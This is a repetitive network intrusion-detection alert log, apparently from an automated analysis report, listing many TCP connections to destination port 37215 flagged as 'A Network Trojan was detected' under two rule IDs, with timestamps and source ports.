          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180589
          SID:2835222
          Source Port:60258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892511
          SID:2835222
          Source Port:59422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780760
          SID:2829579
          Source Port:56012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403915
          SID:2835222
          Source Port:41666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846139
          SID:2835222
          Source Port:37304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546631
          SID:2835222
          Source Port:58428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733061
          SID:2829579
          Source Port:51340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241116
          SID:2829579
          Source Port:44184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786710
          SID:2835222
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510316
          SID:2829579
          Source Port:53210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071467
          SID:2829579
          Source Port:50638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162664
          SID:2829579
          Source Port:53534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403904
          SID:2835222
          Source Port:33816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107420
          SID:2829579
          Source Port:54344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168456
          SID:2829579
          Source Port:56454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159406
          SID:2829579
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808910
          SID:2835222
          Source Port:39982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061951
          SID:2835222
          Source Port:35946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738850
          SID:2829579
          Source Port:46632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160295
          SID:2829579
          Source Port:45946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741625
          SID:2829579
          Source Port:42606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799676
          SID:2829579
          Source Port:34466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263813
          SID:2835222
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495901
          SID:2835222
          Source Port:44252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784068
          SID:2829579
          Source Port:57160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542803
          SID:2829579
          Source Port:39492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912498
          SID:2829579
          Source Port:37992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158943
          SID:2829579
          Source Port:53660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183986
          SID:2835222
          Source Port:47384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185564
          SID:2835222
          Source Port:57064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447006
          SID:2829579
          Source Port:43660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352895
          SID:2835222
          Source Port:38864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671343
          SID:2835222
          Source Port:43736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511055
          SID:2835222
          Source Port:48846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268493
          SID:2835222
          Source Port:54062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115700
          SID:2829579
          Source Port:34218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241548
          SID:2829579
          Source Port:60710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892435
          SID:2835222
          Source Port:36996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463125
          SID:2835222
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812753
          SID:2829579
          Source Port:53528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014591
          SID:2829579
          Source Port:48404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174631
          SID:2829579
          Source Port:52340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018374
          SID:2829579
          Source Port:45450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446470
          SID:2829579
          Source Port:60740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742702
          SID:2829579
          Source Port:47236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509713
          SID:2835222
          Source Port:39128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456174
          SID:2829579
          Source Port:48704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449602
          SID:2829579
          Source Port:38064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166485
          SID:2835222
          Source Port:34390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733957
          SID:2829579
          Source Port:40166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466158
          SID:2829579
          Source Port:42796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859990
          SID:2835222
          Source Port:47472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161242
          SID:2829579
          Source Port:53622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147006
          SID:2835222
          Source Port:38908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509405
          SID:2835222
          Source Port:51808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019882
          SID:2829579
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820908
          SID:2829579
          Source Port:59788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748056
          SID:2829579
          Source Port:46732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107194
          SID:2829579
          Source Port:55218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174849
          SID:2835222
          Source Port:38798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352475
          SID:2829579
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270636
          SID:2829579
          Source Port:34498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883800
          SID:2835222
          Source Port:48716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549351
          SID:2829579
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516964
          SID:2829579
          Source Port:34576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792508
          SID:2835222
          Source Port:53136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542976
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175553
          SID:2835222
          Source Port:41942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600754
          SID:2829579
          Source Port:60076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669869
          SID:2829579
          Source Port:51104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133799
          SID:2829579
          Source Port:52330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849656
          SID:2835222
          Source Port:53322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444986
          SID:2835222
          Source Port:39866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461875
          SID:2835222
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806781
          SID:2829579
          Source Port:40112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408234
          SID:2835222
          Source Port:49900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179966
          SID:2835222
          Source Port:56656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542304
          SID:2829579
          Source Port:57924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850417
          SID:2829579
          Source Port:34372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708109
          SID:2835222
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796306
          SID:2835222
          Source Port:36306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356503
          SID:2829579
          Source Port:48432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708582
          SID:2829579
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468940
          SID:2835222
          Source Port:42312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175773
          SID:2829579
          Source Port:54470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841776
          SID:2835222
          Source Port:46638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061814
          SID:2835222
          Source Port:56836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901702
          SID:2835222
          Source Port:41450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303134
          SID:2835222
          Source Port:34224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829571
          SID:2835222
          Source Port:49188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442469
          SID:2835222
          Source Port:34300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135928
          SID:2835222
          Source Port:59172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356186
          SID:2835222
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819397
          SID:2829579
          Source Port:44252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709601
          SID:2835222
          Source Port:55162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850584
          SID:2829579
          Source Port:36020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406207
          SID:2829579
          Source Port:37482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739199
          SID:2829579
          Source Port:49216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706957
          SID:2835222
          Source Port:50262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780863
          SID:2835222
          Source Port:58122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020388
          SID:2835222
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800330
          SID:2829579
          Source Port:47860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901544
          SID:2829579
          Source Port:59530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354796
          SID:2829579
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797786
          SID:2829579
          Source Port:53976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173778
          SID:2829579
          Source Port:55796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019143
          SID:2829579
          Source Port:36072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512676
          SID:2835222
          Source Port:39626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912981
          SID:2829579
          Source Port:38186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668102
          SID:2829579
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.831706
          SID:2829579
          Source Port:51390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789406
          SID:2835222
          Source Port:53938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669668
          SID:2829579
          Source Port:49370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021008
          SID:2829579
          Source Port:51022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018392
          SID:2829579
          Source Port:52432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353425
          SID:2829579
          Source Port:42400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409929
          SID:2835222
          Source Port:32992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672941
          SID:2829579
          Source Port:46562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107607
          SID:2835222
          Source Port:34802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463677
          SID:2829579
          Source Port:43096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739509
          SID:2829579
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110180
          SID:2829579
          Source Port:47560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671163
          SID:2835222
          Source Port:36814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446790
          SID:2835222
          Source Port:60868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108869
          SID:2835222
          Source Port:47648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902394
          SID:2829579
          Source Port:38878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732119
          SID:2829579
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797557
          SID:2835222
          Source Port:54980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862312
          SID:2829579
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706729
          SID:2835222
          Source Port:50042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732306
          SID:2829579
          Source Port:53318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173271
          SID:2835222
          Source Port:32964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159661
          SID:2829579
          Source Port:35370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269309
          SID:2835222
          Source Port:45632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894515
          SID:2835222
          Source Port:53212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378446
          SID:2829579
          Source Port:52332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673858
          SID:2829579
          Source Port:46666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746260
          SID:2829579
          Source Port:46064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177341
          SID:2829579
          Source Port:32776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378300
          SID:2835222
          Source Port:46072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552444
          SID:2829579
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353552
          SID:2829579
          Source Port:55684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911727
          SID:2829579
          Source Port:41670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517369
          SID:2835222
          Source Port:57432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184003
          SID:2829579
          Source Port:59436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188214
          SID:2835222
          Source Port:46076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179225
          SID:2835222
          Source Port:38088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177322
          SID:2829579
          Source Port:55310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039369
          SID:2829579
          Source Port:48008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787499
          SID:2829579
          Source Port:37366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159478
          SID:2835222
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672315
          SID:2829579
          Source Port:42946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808140
          SID:2829579
          Source Port:44392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350735
          SID:2835222
          Source Port:35096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709544
          SID:2835222
          Source Port:38484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036206
          SID:2829579
          Source Port:56638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108475
          SID:2829579
          Source Port:49356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670420
          SID:2835222
          Source Port:49622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410750
          SID:2829579
          Source Port:39258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153447
          SID:2829579
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897779
          SID:2829579
          Source Port:50194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271950
          SID:2835222
          Source Port:47772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356294
          SID:2829579
          Source Port:42092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792301
          SID:2829579
          Source Port:42730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813491
          SID:2835222
          Source Port:49924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162660
          SID:2829579
          Source Port:56294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159333
          SID:2829579
          Source Port:53286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780359
          SID:2829579
          Source Port:42430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787984
          SID:2835222
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461301
          SID:2829579
          Source Port:42968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512709
          SID:2835222
          Source Port:35036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107789
          SID:2829579
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176502
          SID:2829579
          Source Port:37560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465393
          SID:2829579
          Source Port:59882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786367
          SID:2829579
          Source Port:40206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897142
          SID:2829579
          Source Port:34120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269185
          SID:2829579
          Source Port:55308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706984
          SID:2835222
          Source Port:34358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180220
          SID:2835222
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108497
          SID:2829579
          Source Port:43266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081788
          SID:2835222
          Source Port:46652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403979
          SID:2829579
          Source Port:42840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155812
          SID:2829579
          Source Port:45496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672640
          SID:2835222
          Source Port:37002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732233
          SID:2835222
          Source Port:56740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274090
          SID:2829579
          Source Port:39292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884430
          SID:2829579
          Source Port:39756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743603
          SID:2829579
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113591
          SID:2835222
          Source Port:35034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084763
          SID:2835222
          Source Port:33038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066192
          SID:2835222
          Source Port:55358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.144932
          SID:2829579
          Source Port:59526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150635
          SID:2835222
          Source Port:57646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789769
          SID:2829579
          Source Port:34880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152847
          SID:2829579
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409754
          SID:2835222
          Source Port:58666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746339
          SID:2835222
          Source Port:43758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
